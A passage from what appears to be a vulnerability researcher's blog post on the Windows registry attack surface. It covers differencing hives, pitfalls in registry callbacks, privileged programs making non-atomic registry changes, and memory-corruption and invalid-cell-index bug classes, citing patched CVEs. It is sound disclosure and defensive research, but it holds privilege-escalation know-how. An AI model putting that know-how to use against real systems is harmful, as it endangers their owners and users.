I encourage those interested in further exploring this topic to read Microsoft's Containerized Configuration patent (US20170279678A1), the "Registry virtualization" section in Chapter 10 of Windows Internals (Part 2, 7th Edition), as well as my previous blog post #6, where I briefly described many internal structures related to layered keys.All of these references are great resources that can provide a good starting point for further analysis.
When it comes to layered keys in the context of attack entry points, it's important to note that loading custom differencing hives in Windows is not straightforward. As I wrote in blog post #4, loading this type of hive is not possible at all through any standard NtLoadKey-family syscall. Instead, it is done by sending an undocumented IOCTL 0x220008 to \Device\VRegDriver, which then passes this request on to an internal kernel function named CmLoadDifferencingKey. Therefore, the first obstacle is that in order to use this IOCTL interface, one would have to reverse engineer the layout of its corresponding input structure. Fortunately, I have already done it and published it in the blog post under the VRP_LOAD_DIFFERENCING_HIVE_INPUT name. However, a second, much more pressing problem is that communicating with the VRegDriver requires administrative rights, so it can only be used for testing purposes, but not in practical privilege escalation attacks.
So, what options are we left with? Firstly, there are potential scenarios where the exploit is packaged in a mechanism that legitimately uses differencing hives, e.g., an MSIX-packaged application running in an app silo, or a specially crafted Docker container running in a server silo. In such cases, we provide our own hives by design, which are then loaded on the victim’s system on our behalf when the malicious program or container is started. The second option is to simply ignore the inability to load our own hive and use one already present in the system. In a default Windows installation, many built-in applications use differencing hives, and the \Registry\WC key can be easily enumerated and opened without any problems (unlike \Registry\A). Therefore, if we launch a program running inside an app silo (e.g., Notepad) as a local user, we can then operate on the differencing hives loaded by it. This is exactly what I did in most of my proof-of-concept exploits related to this functionality. Of course, it is possible that a given bug will require full binary control over the differencing hive in order to trigger it, but this is a relatively rare case: of the 10 vulnerabilities I identified in this code, only two of them required such a high degree of control over the hive.
Alternative registry attack targets
The most crucial attack surface associated with the registry is obviously its implementation within the Windows kernel. However, other types of software interact with the registry in many ways and can also be prone to privilege escalation attacks through this mechanism. They are discussed in the following sections.
Drivers implementing registry callbacks
Another area where potential registry-related security vulnerabilities can be found is Registry Callbacks. This mechanism, first introduced in Windows XP and still present today, provides an interface for kernel drivers to log or interfere with registry operations in real-time. One of the most obvious uses for this functionality is antivirus software, which relies on registry monitoring. Microsoft, aware of this need but wanting to avoid direct syscall hooking by drivers, was compelled to provide developers with an official, documented API for this purpose.
From a technical standpoint, callbacks can be registered using either the CmRegisterCallback function or its more modern version, CmRegisterCallbackEx. The documentation for these functions serves as a good starting point for exploring the mechanism, as it seamlessly leads to the documentation of the callback function itself, and from there to the documentation of all the structures that describe the individual operations. Generally speaking, callbacks can monitor virtually any type of registry operation, both before ("pre" callbacks) and after ("post" callbacks) it is performed. They can be used to inspect what is happening in the system and log the details of specific events of interest. Callbacks can also influence the outcome of an operation. In "pre" notifications, they can modify input data or completely take control of the operation and return arbitrary information to the caller while bypassing the standard operation logic. During "post" notification handling, it is possible to influence both the status returned to the user and the output data. Overall, depending on the amount and types of operations supported in a callback, a completely error-free implementation can be really difficult to write. It requires excellent knowledge of the inner workings of the registry, as well as a very thorough reading of the documentation related to callbacks. The contracts that exist between the Windows kernel and the callback code can be very complicated, so in addition to the sources mentioned above, it's also worth reading the entire separate series of seven articles detailing various callback considerations, titled Filtering Registry Calls.
Here are some examples of things that can go wrong in the implementation of callbacks:
Standard user-mode memory access bugs. As per the documentation (refer to the table at the bottom of the Remarks section), pointers to output data received in "post" type callbacks contain the original user-mode addresses passed to the syscall by the caller. This means that if the callback wants to reference this data in any way, the only guarantee it has is that these pointers have been previously probed. However, it is still important to access this memory within a try/except block and to avoid potential double-fetch vulnerabilities by always copying the data to a kernel-mode buffer first before operating on it.
A somewhat related but higher-level issue is excessive trust in the output data structure within "post" callbacks. The problem is that some registry syscalls return data in a strictly structured way, and since the "post" callback executes before returning to user mode, it might seem safe to trust that the output data conforms to its documented format (if one wants to use or slightly modify it). An example of such a syscall is NtQueryKey, which returns a specific structure for each of the several possible information classes. In theory, it would appear that a malicious program has not yet had the opportunity to modify this data, and it should still be valid when the callback executes. In practice, however, this is not the case, because the output data has already been copied to user-mode, and there may be a parallel user thread modifying it concurrently. Therefore, it is very important that if one wants to use the output data in the "post" callback, they must first fully sanitize it, assuming that it may be completely arbitrary and is as untrusted as any other input data.
Moving up another level, it's important to prevent confused deputy problems that exploit the fact that callback code runs with kernel privileges. For example, if a callback wanted to redirect access to certain registry paths to another location, and it used the ZwCreateKey call without the OBJ_FORCE_ACCESS_CHECK flag to do so, it would allow an attacker to create keys in locations where they normally wouldn't have access.
Bugs in the emulation of certain operations in "pre"-type callbacks. If a callback decides to handle a given request on its own and signal this to the kernel by returning the STATUS_CALLBACK_BYPASS code, it is responsible for filling all important fields in the corresponding REG_XXX_KEY_INFORMATION structure so that, in accordance with the expected syscall behavior, the output data is correctly returned to the caller (source: "When a registry filtering driver's RegistryCallback routine receives a pre-notification [...]" and "Alternatively, if the driver changes a status code from failure to success, it might have to provide appropriate output parameters.").
Bugs in "post"-type callbacks that change an operation's status from success to failure. If we want to block an operation after it has already been executed, we must remember that it has already occurred, with all its consequences and side effects. To successfully pretend that it did not succeed, we would have to reverse all its visible effects for the user and release the resources allocated for this purpose. For some operations, this is very difficult or practically impossible to do cleanly, so I would personally recommend only blocking operations at the "pre" stage and refraining from trying to influence their outcome at the "post" stage (source: "If the driver changes a status code from success to failure, it might have to deallocate objects that the configuration manager allocated.").
Challenges presented by error handling within "post"-type callbacks. As per the documentation, the kernel only differentiates between a STATUS_CALLBACK_BYPASS return value and all others, which means that it doesn't really discern callback success or failure. This is somewhat logical since, at this stage, there isn't a good way to handle failures – the operation has already been performed. On the other hand, it may be highly unintuitive, as the Windows kernel idiom "if (!NT_SUCCESS(Status)) { return Status; }" becomes ineffective here. If an error is returned, it won't propagate to user mode, and will only cause premature callback exit, potentially leaving some important operations unfinished. To address this, you should design "post" callbacks to be inherently fail-safe (e.g., include no dynamic allocations), or if this isn't feasible, implement error handling cautiously, ensuring that minor operation failures don't compromise the callback's overall logical/security guarantees.
Issues surrounding the use of a key object pointer passed to the callback, in one of a few specific scenarios where it can have a non-NULL value but not point to a valid key object. This topic is explored in a short article in Microsoft Learn: Invalid Key Object Pointers in Registry Notifications.
Issues in open/create operation callbacks due to missing or incorrect handling of symbolic links and other redirections, which are characterized by the return values STATUS_REPARSE and STATUS_REPARSE_GLOBAL.
Bugs that result from a lack of transaction support where it is needed. This could be an incorrect assumption that every operation performed on the registry is non-transactional and its effect is visible immediately, and not only after the transaction is committed. The API function that is used to retrieve the transaction associated with a given key (if it exists) during callback execution is CmGetBoundTransaction.
Issues arising from using the older API version, CmCallbackGetKeyObjectID, instead of the newer CmCallbackGetKeyObjectIDEx. The older version has some inherent problems discussed in the documentation, such as returning an outdated key path if the key name has been changed by an NtRenameKey operation.
Issues stemming from an overreliance on the CmCallbackGetKeyObjectID(Ex) function to retrieve a key's full path. A local user can cause these functions to deterministically fail by creating and operating on a key with a path length exceeding 65535 bytes (the maximum length of a string represented by the UNICODE_STRING structure). This can be achieved using the key renaming trick described in CVE-2022-37990, and results in the CmCallbackGetKeyObjectID(Ex) function returning the STATUS_INSUFFICIENT_RESOURCES error code. This is problematic because the documentation for this function does not mention this error code, and there is no way to defend against it from the callback's perspective. The only options are to avoid relying on retrieving the full key path altogether, or to implement a defensive fallback plan if this operation fails.
Logical bugs arising from attempts to block access to certain registry keys by path, but neglecting the key rename operation, which can change the key's name dynamically and bypass potential filtering logic in the handling of the open/create operations. Notably, it's difficult to blame developers for such mistakes, as even the official documentation discourages handling NtRenameKey operations, citing its high complexity (quote: "Several registry system calls are not documented because they are rarely used [...]").
As we can see, developers using these types of callbacks can fall into many traps, and the probability of introducing a bug increases with the complexity of the callback's logic.
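To make the first two pitfalls above concrete, the following portable sketch (the struct and function names are mine, standing in for the real REG_*_INFORMATION structures) shows the snapshot-then-sanitize pattern a "post" callback should follow when touching output data:

```cpp
#include <cstdint>
#include <cstring>

// Toy model of handling output data in a "post" callback. The shared
// buffer may be modified concurrently by a user-mode thread, so the
// callback must (1) copy it exactly once into private memory and then
// (2) sanitize the copy -- never the original.
struct KeyNameInformation {
  uint32_t NameLength;  // In bytes; fully attacker-controlled.
  char Name[64];
};

// Returns the captured name length, or -1 if the snapshot fails validation.
int CaptureNameLength(const volatile KeyNameInformation* shared) {
  KeyNameInformation snapshot;
  // Single fetch: one copy, after which only `snapshot` is used.
  std::memcpy(&snapshot, const_cast<const KeyNameInformation*>(shared),
              sizeof(snapshot));
  // Sanitize the private copy as if it were arbitrary input.
  if (snapshot.NameLength > sizeof(snapshot.Name)) {
    return -1;  // Inconsistent or malicious length; reject.
  }
  return static_cast<int>(snapshot.NameLength);
}
```

In real callback code, the copy would additionally happen inside a try/except block, since the source pointer is a user-mode address that can be unmapped at any time.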
There are two approaches a security researcher can take to enumerate this attack surface in search of vulnerable callbacks: static and dynamic. The static approach involves searching the file system (especially C:\Windows\system32\drivers) for the "CmRegisterCallback" string, as every driver that registers a callback must refer to this function or its "Ex" equivalent. As for the dynamic approach, the descriptors of all callbacks in the system are linked together in a doubly-linked list that begins in the global nt!CallbackListHead object. Although the structure of these descriptors is undocumented, my analysis indicates that the pointer to the callback function is located at offset 0x28 in Windows 11. Therefore, all callbacks registered in the system at a given moment can be listed using the following WinDbg command:
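One possible form of such a command, built on the standard !list debugger extension and the 0x28 offset mentioned above (treat the exact invocation as an approximation):

```
kd> !list -x "dps @$extret+0x28 L1" nt!CallbackListHead
```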
Even on a clean Windows 11 system, the operating system and its drivers register a substantial number of callbacks. The first line of the command's output can be ignored, as it refers to the nt!CallbackListHead object, which is the beginning of the list and not a real callback descriptor. The remaining functions are associated with the following modules:
WdFilter!MpRegCallback: a callback registered by Windows Defender, the default antivirus engine running on Windows.
applockerfltr!SmpRegistryCallback: a callback registered by the Smartlocker Filter Driver, which is one of the drivers that implement the AppLocker/SmartLocker functionality at the kernel level.
UCPD+0x5dd0: a callback associated with the UCPD.sys driver, which expands to "User Choice Protection Driver". This is a module that prevents third-party software from modifying the default application settings for certain file types and protocols, such as web browsers and PDF readers. As we can infer from the format of this symbol and its unresolved name, Microsoft does not currently provide PDB debug symbols for the executable image, but some information online indicates that such symbols were once available for older builds of the driver.
nt!VrpRegistryCallback: a callback implemented by the VRegDriver, which is part of the core Windows kernel executable image, ntoskrnl.exe. It plays a crucial role in the system, as it is responsible for redirecting key references to their counterparts within differencing hives for containerized processes. It is likely the most interesting and complex callback registered by default in Windows.
bfs!BfsRegistryCallback: the callback is a component of the Brokering File System driver. It is primarily responsible for supporting secure file access for applications running in an isolated environment (AppContainers). However, it also has a relatively simple registry callback that supports key opening/creation operations. It is not entirely clear why the functionality wasn't simply incorporated into the VrpRegistryCallback, which serves a very similar purpose.
In my research, I primarily focused on reviewing the callback invocations in individual registry operations (specifically calls to the CmpCallCallBacksEx function), and on the correctness of the VrpRegistryCallback function implementation. As a result, I discovered CVE-2023-38141 in the former area, and three further bugs in the VRegDriver (CVE-2023-38140, CVE-2023-36803 and CVE-2023-36576). These reports serve as a very good example of the many types of problems that can occur in registry callbacks.
Privileged registry clients: programs and drivers
The final attack target related to the registry is the highly privileged users of this interface, that is, user-mode processes running with administrator/system rights, and kernel drivers that operate on the registry. The registry is a shared resource by design, and apart from app hives mounted in the special \Registry\A key, every program in the system can refer to any active key as long as it has the appropriate permissions. For a malicious user, this means two things: first, they can try to exploit weaknesses exhibited by other processes when interacting with the registry, and second, they can try to actively interfere with those processes. I can personally imagine two main types of issues related to incorrect use of the registry, and both of them are quite high-level by nature.
The first concern is related to the fact that the registry, as a part of the NT Object Manager model, undergoes standard access control through security access checks. Each registry key is mandatorily assigned a specific security descriptor. Therefore, as the name implies, it is crucial for system security that each key's descriptor has the minimum permissions required for proper functionality, while aligning with the author's intended security model for the application.
From a technical perspective, a specific security descriptor for a given key can be set either during its creation through the lpSecurityAttributes argument of RegCreateKeyExW, or separately by calling the RegSetKeySecurity API. If no descriptor is explicitly set, the key assumes a default descriptor based largely on the security settings of its parent key. This model makes sense from a practical standpoint. It allows most applications to avoid dealing with the complexities of custom security descriptors, while still maintaining a reasonable level of security, as high-level keys in Windows typically have well-configured security settings. Consider the well-known HKLM\Software tree, where Win32 applications have stored their global settings for many years. The assumption is that ordinary users have read access to the global configuration within that tree, but only administrators can write to it. If an installer or application creates a new subkey under HKLM\Software without explicitly setting a descriptor, it inherits the default security properties, which is sufficient in most cases.
However, certain situations require extra care to properly secure registry keys. For example, if an application stores highly sensitive data (e.g., user passwords) in the registry, it is important to ensure that both read and write permissions are restricted to the smallest possible group of users (e.g., administrators only). Additionally, when assigning custom security descriptors to keys in global system hives, you should exercise caution to avoid inadvertently granting write permissions to all system users. Furthermore, if a user has KEY_CREATE_LINK access to a global key used by higher-privileged processes, they can create a symbolic link within it, potentially resulting in a "confused deputy" problem and the ability to create registry keys under any path. In summary, for developers creating high-privilege code on Windows and utilizing the registry, it is essential to carefully handle the security descriptors of the keys they create and operate on. From a security researcher's perspective, it could be useful to develop tooling to list all keys that allow specific access types to particular groups in the system and run it periodically on different Windows versions and configurations. This approach can lead to some very easy bug discoveries, as it doesn't require any time spent on reverse engineering or code auditing.
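As a sketch of what such tooling could check, the following portable fragment models the core predicate. The structures are simplified stand-ins (a real scanner would walk actual DACLs with APIs like GetNamedSecurityInfo and GetAce); the constants mirror the Windows KEY_SET_VALUE and KEY_CREATE_LINK access rights, and "S-1-1-0" is the well-known SID of the Everyone group.

```cpp
#include <cstdint>
#include <string>
#include <vector>

// Simplified stand-in for an access-allowed ACE.
struct Ace {
  std::string sid;       // e.g. "S-1-1-0" is the Everyone group.
  uint32_t access_mask;  // Simplified access bits.
};

// These values mirror the real Windows registry access rights.
constexpr uint32_t KEY_SET_VALUE_RIGHT   = 0x0002;
constexpr uint32_t KEY_CREATE_LINK_RIGHT = 0x0020;

// Flag keys whose DACL grants write-type access to Everyone -- the kind
// of result worth reviewing manually for privilege escalation potential.
bool IsWorldWritable(const std::vector<Ace>& dacl) {
  for (const Ace& ace : dacl) {
    if (ace.sid == "S-1-1-0" &&
        (ace.access_mask & (KEY_SET_VALUE_RIGHT | KEY_CREATE_LINK_RIGHT)) != 0) {
      return true;
    }
  }
  return false;
}
```

In a real tool, the interesting part is less the predicate itself than running it across the whole registry on many Windows versions and diffing the results over time.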
The second type of issue is more subtle and arises because a single "configuration unit" in the registry sometimes consists of multiple elements (keys, values) and must be modified atomically to prevent an inconsistent state and potential vulnerabilities. For such cases, there is support for transactions in the registry. If a given process manages a configuration that is critical to system security and in which different elements must always be consistent with each other, then making use of the Transacted Registry (TxR) is practically mandatory. A significantly worse, though somewhat acceptable solution may be to implement a custom rollback logic, i.e., in the event of a failure of some individual operation, manually reversing the changes that have been applied so far. The worst case scenario is when a privileged program does not realize the seriousness of introducing partial changes to the registry, and implements its logic in a way typical of using the API in a best-effort manner, i.e.: calling Win32 functions as long as they succeed, and when any of them returns an error, then simply passing it up to the caller without any additional cleanup.
Let's consider this bug class using the example of a hypothetical service that, through some local inter-process communication interface, allows users to register applications for startup. It creates a key structure under the HKLM\Software\CustomAutostart\<Application Name> path, and for each such key it stores two values: the command line to run during system startup ("CommandLine"), and the username with whose privileges to run it ("UserName"). If the username value does not exist, it implicitly assumes that the program should start with system rights. Of course, the example service intends to be secure, so it only allows setting the username to the one corresponding to the security token of the requesting process. Operations on the registry take place in the following order:
Create a new key named HKLM\Software\CustomAutostart\<Application Name>,
Set the "CommandLine" value to the string provided by the client,
Set the "UserName" value to the string provided by the client.
The issue with this logic is that it's not transactional – if an error occurs, the execution simply aborts, leaving the partial state behind. For example, if operation #3 fails for any reason, an entry will be added to the autostart indicating that a controlled path should be launched with system rights. This directly leads to privilege escalation and was certainly not the developer's intention. One might wonder why any of these operations would fail, especially in a way controlled by an attacker. The answer is simple and was explained in the "Susceptibility to mishandling OOM conditions" section. A local attacker has at least two ways of influencing the success or failure of registry operations in the system: by filling the space of the hive they want to attack (if they have write access to at least one of its keys) or by occupying the global registry quota in memory, represented by the global nt!CmpGlobalQuota variable. Unfortunately, finding such vulnerabilities is more complicated than simply scanning the entire registry for overly permissive security descriptors. It requires identifying candidates of registry operations in the system that have appropriate characteristics (high-privilege process, lack of transactionality, sensitivity to a partial/incomplete state), and then potentially reverse-engineering the specific software to get a deeper understanding of how it interacts with the registry. Tools like Process Monitor may come in handy at least in the first part of the process.
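To make the failure mode concrete, here is a portable sketch of the hypothetical service's logic (a real implementation would use RegCreateKeyExW/RegSetValueExW, ideally wrapped in a transaction). The in-memory "key" and all names are invented; the point is the contrast between the best-effort variant, which leaves partial state behind, and one that manually rolls back on failure:

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

/* Tiny in-memory stand-in for the autostart key. */
typedef struct {
    bool key_exists;
    char command_line[64];  /* "CommandLine" value */
    char user_name[64];     /* "UserName" value; empty = not set, i.e.
                               the service will run the entry as SYSTEM */
} MODEL_KEY;

/* Simulated failure switch: in reality an attacker can induce failures by
   exhausting hive space or the global registry quota. */
static bool set_value(char *dst, const char *src, bool fail) {
    if (fail) return false;
    strncpy(dst, src, 63);
    dst[63] = '\0';
    return true;
}

/* Vulnerable, best-effort variant: bails out on the first error, leaving
   partial state behind (key + CommandLine present, UserName missing). */
static bool register_autostart_besteffort(MODEL_KEY *k, const char *cmd,
                                          const char *user, bool fail_last) {
    k->key_exists = true;                                        /* step 1 */
    if (!set_value(k->command_line, cmd, false)) return false;   /* step 2 */
    if (!set_value(k->user_name, user, fail_last)) return false; /* step 3 */
    return true;
}

/* Safer variant: rolls back (deletes the key) if any step fails, so no
   partial state survives an induced error. */
static bool register_autostart_rollback(MODEL_KEY *k, const char *cmd,
                                        const char *user, bool fail_last) {
    if (!register_autostart_besteffort(k, cmd, user, fail_last)) {
        memset(k, 0, sizeof(*k));   /* undo everything */
        return false;
    }
    return true;
}
```

Note how the best-effort variant fails into exactly the dangerous state: the key and "CommandLine" exist, but "UserName" does not, so the attacker-controlled path would be launched with system rights.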
One example of a vulnerability related to the incorrect guarantee of atomicity of system-critical structures is CVE-2024-26181. As a result of exhausting the global registry quota, it could lead to permanent damage to the HKLM\SAM hive, which stores particularly important information about users in the system, their passwords, group memberships, etc.
Vulnerability primitives
In this chapter, we will focus on classifying registry vulnerabilities based on the primitives they offer, and briefly discuss their practical consequences and potential exploitation methods.
Pool memory corruption
Pool memory corruption is probably the most common type of low-level vulnerability in the Windows kernel. In the context of the registry, this bug class is somewhat rarer than in other ring-0 components, but it certainly still occurs. It manifests in its most "pure" form when the corruption happens within an auxiliary object that is temporarily allocated on the pools to implement a specific operation. One such example is a report concerning three vulnerabilities—CVE-2022-37990, CVE-2022-38038, and CVE-2022-38039—all stemming from a fairly classic 16-bit integer overflow when calculating the length of a dynamically allocated buffer. Another example is CVE-2023-38154, where the cause of the buffer overflow was slightly more intricate and originated from a lack of error handling in one of the functions responsible for recovering the hive state from LOG files.
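The arithmetic at the root of that report is easy to reproduce in isolation: when a length is computed in a 16-bit type, a sum that exceeds 65,535 silently wraps around, so the code ends up allocating a buffer far smaller than the amount of data later copied into it. A minimal illustration of the general pattern (the variable names are invented):

```c
#include <assert.h>
#include <stdint.h>

/* The classic 16-bit truncation pattern: both inputs are individually
   valid, but their sum wraps modulo 65536, and the wrapped result is
   then used as an allocation size. */
static uint16_t total_length(uint16_t name_len, uint16_t extra) {
    return (uint16_t)(name_len + extra);   /* silently wraps */
}
```

If `total_length` is used for the allocation while the unwrapped lengths drive the subsequent copies, a pool buffer overflow follows.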
The second type of pool memory corruption that can occur in the registry involves problems with managing long-lived objects that are used to cache some information from the hive mapping in more readily accessible pool memory — such as those described in post #6. In this case, we are usually dealing with UAF-type conditions, like releasing an object while there are still some active references to it. If I had to point to one object that could be most prone to this type of bug, it would probably be the Key Control Block, which is reference counted, used by the implementation of almost every registry syscall, and for which there are some very strong invariants critical for memory safety (e.g., the existence of only one KCB for a particular key in the global KCB tree). One issue related to KCBs was CVE-2022-44683, which resulted from incorrect handling of predefined keys in the NtNotifyChangeMultipleKeys system call.
Another, slightly different category of UAFs on pools are situations in which this type of condition is not a direct consequence of a vulnerability, but more of a side effect. Let's take security descriptors as an example: they are located in the hive space, but the kernel also maintains a cache reflecting the state of these descriptors on the kernel pools (in _CMHIVE.SecurityCache and related fields). Therefore, if for some reason a security descriptor in the hive is freed prematurely, this problem will also be automatically reflected in the cache, and some keys may start to have a dangling KCB.CachedSecurity pointer set to the released object. I have taken advantage of this fact many times in my reports to Microsoft, because it was very useful for reliably triggering crashes. While generating a bugcheck based on the UAF of the _CM_KEY_SECURITY structure in the hive is possible, it is much more convoluted than simply turning on the Special Pool mechanism and making the kernel refer to the cached copy of the security descriptor (a few examples: CVE-2023-23421, CVE-2023-35382, CVE-2023-38139). In some cases, exploiting memory corruption on pools may also offer some advantages over exploiting hive-based memory corruption, so it is definitely worth remembering this behavior for the future.
When it comes to the strictly technical aspects of kernel pool exploitation, I won't delve into it too deeply here. I didn't specifically focus on it in my research, and there aren't many interesting registry-specific details to mention in this context. If you are interested in learning more about this topic, please refer to the resources available online.
Hive memory corruption
The second type of memory corruption encountered in the registry is hive-based memory corruption. This class of bugs is unique to the registry and is based on the fact that data stored in hives serves a dual role. It stores information persistently on disk, but it also works as the representation of the hive in memory in the exact same form. The data is then operated on using C code through pointers, helper functions like memcpy, and so on. Given all this, it doesn't come as a surprise that classic vulnerabilities such as buffer overflows or use-after-free can also occur within this region.
So far, during my research, I have managed to find 17 hive-based memory corruption issues, which constitutes approximately 32% of all 53 vulnerabilities that have been fixed by Microsoft in security bulletins. The vast majority of them were related to just two mechanisms – reference counting security descriptors and operating on subkey lists – but there were also cases of bugs related to other types of objects.
I have started using the term "inconsistent hive state" to refer to any situation where the regf format state either ceases to be internally consistent or stops accurately reflecting cached copies of the same data within other kernel objects. I described one such issue here, where the _CM_BIG_DATA.Count field stops correctly corresponding to the _CM_KEY_VALUE.DataLength field for the same registry value. However, despite this specific behavior being incorrect, according to both my analysis and Microsoft's, it doesn't have any security implications for the system. In this context, the term "hive-based memory corruption" denotes a slightly narrower group of issues that not only allow reaching any inconsistent state but specifically enable overwriting valid regf structures with attacker-controlled data.
The general scheme for exploiting hive-based memory corruption closely resembles the typical exploitation of any other memory corruption. The attacker's initial objective is to leverage the available primitive and manipulate memory allocations/deallocations to overwrite a specific object in a controlled manner. On modern systems, achieving this stage reliably within the heap or kernel pools can be challenging due to allocator randomization and enforced consistency checks. However, the cell allocator implemented by the Windows kernel is highly favorable for the attacker: it lacks any safeguards, and its behavior is entirely deterministic, which greatly simplifies this stage of exploit development. One could even argue that, given the properties of this allocator, virtually any memory corruption primitive within the regf format can be transformed into complete control of the hive in memory with some effort.
With this assumption, let's consider what to do next. Even if we have absolute control over all the internal data of the mapped hive, we are still limited to its mapping in memory, which in itself does not give us much. The question arises as to how we can "escape" from this memory region and use hive memory corruption to overwrite something more interesting, like an arbitrary address in kernel memory (e.g., the security token of our process).
First of all, it is worth noting that such an escape is not always necessary – if the attack is carried out in one of the system hives (SOFTWARE, SYSTEM, etc.), we may not need to corrupt the kernel memory at all. In this case, we could simply perform a data-only attack and modify some system configuration, grant ourselves access to important system keys, etc. However, with many bugs, attacking a highly privileged hive is not possible. Then, the other option available to the attacker is to modify one of the cells to break some invariant of the regf format, and cause a second-order side effect in the form of a kernel pool corruption. Some random ideas are:
Setting too long a key name or inserting the illegal character '\' into the name,
Creating a fake exit node key,
Corrupting the binary structure of a security descriptor so that the internal APIs operating on them start misbehaving,
Crafting a tree structure within the hive with a depth greater than the maximum allowed (512 levels of nesting),
... and many, many others.
However, during experiments exploring practical exploitation, I discovered an even better method that grants an attacker the ability to perform reliable arbitrary read and write operations in kernel memory—the ultimate primitive. This method takes advantage of 32-bit cell index values, which exhibit unusual behavior when they exceed the hive's total size. I won't elaborate on the full technique here, but for those interested, I discussed it during my presentation at the OffensiveCon conference in May 2024. The subject of exploiting hive memory corruption will also be covered in detail in its own dedicated blog post in the future.
Invalid cell indexes
This is a class of bugs that manifests directly when an incorrect cell index appears in an object—either in a cell within the hive or in a structure on kernel pools, like KCB. These issues can be divided into three subgroups, depending on the degree of control an attacker can gain over the cell index.
Cell index 0xFFFFFFFF (HCELL_NIL)
This is a special marker that indicates that a given structure member/variable of type HCELL_INDEX doesn't point to any specific cell, which is equivalent to a NULL pointer in C. There are many situations where the value 0xFFFFFFFF (in other words, -1) is used and even desired, e.g. to signal that an optional object doesn't exist and shouldn't be processed. The kernel code is prepared for such cases and correctly checks whether a given cell index is equal to this marker before operating on it. However, problems can arise when the value ends up in a place where the kernel always expects a valid index. Any mandatory field in a specific object can be potentially subject to this problem, such as the _CM_KEY_NODE.Security field, which must always point to a valid descriptor and should never be equal to -1 (other than for exit nodes).
Some examples of such vulnerabilities include:
CVE-2023-21772: an unexpected value of -1 being set in _CM_KEY_NODE.Security due to faulty logic in the registry virtualization code, which first freed the old descriptor and only then attempted to allocate a new one, which could fail, leaving the key without any assigned security descriptor.
CVE-2023-35357: an unexpected value of -1 being set in KCB.KeyCell, because the code assumed that it was operating on a physically existing base key, while in practice it could operate on a layered key with Merge-Unbacked semantics, which does not have its own key node, but relies solely on key nodes at lower levels of the key stack.
CVE-2023-35358: another case of an unexpected value of -1 being set in KCB.KeyCell, while the kernel expected that at least one key in the given key node stack would have an allocated key node object. The source of the problem here was incorrect integration of transactions and differencing hives.
When such a problem occurs, it always manifests by the value -1 being passed as the cell index to the HvpGetCellPaged function. For decades, this function completely trusted its parameters, assuming that the input cell index would always be within the bounds of the given hive. Consequently, calling HvpGetCellPaged with a cell index of 0xFFFFFFFF would result in the execution of the following code:
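The cell map walk performed on such an index can be sketched in a few lines. A 32-bit cell index decomposes into a storage type bit, a directory index, a table index, and a block offset; the bit widths below follow the regf cell map layout, while the structure and function names are simplified for illustration:

```c
#include <assert.h>
#include <stdint.h>

typedef uint32_t HCELL_INDEX;

/* Decomposition of a cell index as used by the hive cell maps:
     bit  31     storage type (0 = Stable, 1 = Volatile)
     bits 30-21  index into the Directory array (1024 entries)
     bits 20-12  index into a Table array (512 entries)
     bits 11-0   byte offset within the 4 KiB block */
typedef struct {
    uint32_t type, directory, table, offset;
} CELL_MAP_PATH;

static CELL_MAP_PATH decompose(HCELL_INDEX index) {
    CELL_MAP_PATH p;
    p.type      = (index >> 31) & 0x1;
    p.directory = (index >> 21) & 0x3FF;
    p.table     = (index >> 12) & 0x1FF;
    p.offset    = index & 0xFFF;
    return p;
}
```

For 0xFFFFFFFF, every component takes its maximum value, which is exactly the walk described below.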
In other words, the function would refer to the Volatile (1) map cell, and within it, to the last element of the Directory and then the Table arrays. Considering the "small dir" optimization described in post #6, it becomes clear that this cell map walk could result in an out-of-bounds memory access within the kernel pools (beyond the boundaries of the _CMHIVE structure). Personally, I haven't tried to transform this primitive into anything more useful, but it seems evident that with some control over the kernel memory around _CMHIVE, it should theoretically be possible to get the HvpGetCellPaged function to return any address chosen by the attacker. Further exploitation prospects would largely depend on the subsequent operations that would be performed on such a fake cell, and the extent to which a local user could influence them. In summary, I've always considered these types of bugs as "exploitable on paper, but quite difficult to exploit in practice."
Ultimately, none of this matters much, because it seems that Microsoft noticed a trend in these vulnerabilities and, in July 2023, added a special condition to the HvpGetCellFlat and HvpGetCellPaged functions that bugchecks the system whenever the incoming cell index is equal to HCELL_NIL.
This basically means that the specific case of index -1 has been completely mitigated, since rather than allowing any chance of exploitation, the system now immediately shuts down with a Blue Screen of Death. As a result, the bug class no longer has any security implications. However, I do feel a bit disappointed – if Microsoft deemed the check sufficiently important to add to the code, they could have made it just a tiny bit stronger, for example:
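The stronger check the author has in mind would treat the low 31 bits of the index as a position within the selected storage space and reject anything at or past that space's length, which rules out -1 as a side effect. This is only a portable model of the idea; the real kernel code operates on the hive's internal structures and bugchecks rather than returning a flag:

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

typedef uint32_t HCELL_INDEX;
#define HCELL_NIL ((HCELL_INDEX)0xFFFFFFFF)

/* Model hive: just the allocated lengths of its two storage spaces
   (index 0 = Stable, index 1 = Volatile). */
typedef struct { uint32_t length[2]; } MODEL_HIVE;

/* Stronger validation: bit 31 selects the storage type, and the low
   31 bits are the cell's position within that space, so anything past
   the space's length is invalid. HCELL_NIL fails automatically. */
static bool cell_index_in_bounds(const MODEL_HIVE *hive, HCELL_INDEX index) {
    uint32_t type = index >> 31;
    uint32_t position = index & 0x7FFFFFFF;
    return position < hive->length[type];
}
```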
The above check would reject all cell indexes exceeding the length of the corresponding storage type, and it is exactly what the HvpReleaseCellPaged function currently does. Checking this slightly stronger condition would in one fell swoop handle invalid indexes of -1 and completely mitigate the previously mentioned technique of out-of-bounds cell indexes. While not introduced yet, I still secretly hope that it will happen one day... 🙂
Dangling (out-of-date) cell indexes
Another group of vulnerabilities related to cell indexes are cases where, after a cell is freed, its index remains in an active cell within the registry. Simply put, these are just the cell-specific use-after-free conditions, and so the category very closely overlaps with the previously described hive-based memory corruption.
Notable examples of such bugs include:
CVE-2022-37988: Caused by the internal HvReallocateCell function potentially failing when shrinking an existing cell, which its caller assumed was impossible.
CVE-2023-23420: A bug in the transactional key rename operation could lead to a dangling cell index in a key's subkey list, pointing to a freed key node.
CVE-2024-26182: Caused by mishandling a partial success situation where an internal function might successfully perform some operations on the hive (reallocate existing subkey lists) but ultimately return an error code, causing the caller to skip updating the _CM_KEY_NODE.SubKeyLists[...] field accordingly.
In general, UAF bugs within the hive are powerful primitives that can typically be exploited to achieve total control over the hive's internal data. The fact that both exploits I wrote to demonstrate practical exploitation of hive memory corruption vulnerabilities fall into this category (CVE-2022-34707, CVE-2023-23420) can serve as anecdotal evidence of this statement.
Fully controlled/arbitrary cell indexes
